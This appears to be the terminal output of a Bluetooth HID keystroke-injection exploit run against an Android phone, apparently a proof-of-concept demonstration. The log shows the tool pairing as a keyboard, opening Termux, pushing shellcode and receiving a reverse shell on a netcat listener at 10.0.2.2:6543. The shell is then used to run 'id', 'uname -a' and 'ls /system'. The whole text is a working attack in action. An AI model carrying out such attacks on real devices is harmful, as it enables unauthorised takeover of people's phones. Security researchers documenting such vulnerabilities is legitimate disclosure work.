$ sudo ./run.sh 08:AE:D6:6F:DD:F8 10.0.2.2
[sudo] password for marshall:
[*] Building reverse shell for 10.0.2.2:6543
[*] Pairing to 08:AE:D6:6F:DD:F8
[!] Paired 08:AE:D6:6F:DD:F8 to DC:53:60:6C:FC:B3
[!] Go to another terminal and start a netcat listener on port  to handle the shell!
[*] Registered HID profile
[!] Ready, waiting for connection from phone
[*] Control channel connected to 08:AE:D6:6F:DD:F8
[*] Interrupt channel connected to 08:AE:D6:6F:DD:F8
[!] Building shell...
[*] Trying to attain control over device...
[*] Sending back to home screen...
[*] Trying to pull up finder...
[*] Trying to find termux...
[*] Pushing shellcode now...
[!] Back that big ass up guuuuuurl!
listening on [any] 6543 ...
no connection : Connection timed out
[*] Connect timed out, trying again...
[!] Back that big ass up guuuuuurl!
listening on [any] 6543 ...
connect to [10.0.2.2] from nerkon [10.0.2.5] 33812
~ $ id; uname -a
id; uname -a
uid=10466(u0_a466) gid=10466(u0_a466) groups=10466(u0_a466),3003(inet),9997(everybody),20466(u0_a466_cache),50466(all_a466)
Linux localhost 4.4.153-17214672 #2 SMP PREEMPT Thu Oct 21 19:08:15 KST 2021 aarch64 Android
~ $ ls /system
ls /system
app
bin
build.prop
cameradata
carrier
compatibility_matrix.xml
container
csc_contents
embms
etc
fake-libs
fake-libs64
fonts
framework
hidden
info.extra
lib
lib64
lost+found
media
omc
priv-app
product
recovery-from-boot.p
saiv
tima_measurement_info
tts
usr
vendor
voicebargeindata
xbin
~ $ exit
exit
exit
[x] Exploit complete!